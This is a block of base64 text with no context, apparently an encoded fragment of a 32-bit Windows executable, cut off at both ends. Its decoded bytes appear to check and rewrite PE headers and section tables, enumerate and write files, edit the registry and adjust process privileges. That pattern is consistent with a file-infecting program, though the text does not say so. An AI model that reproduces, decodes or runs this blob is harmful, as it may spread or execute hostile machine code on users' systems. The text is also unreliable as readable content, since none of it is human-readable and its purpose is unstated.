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 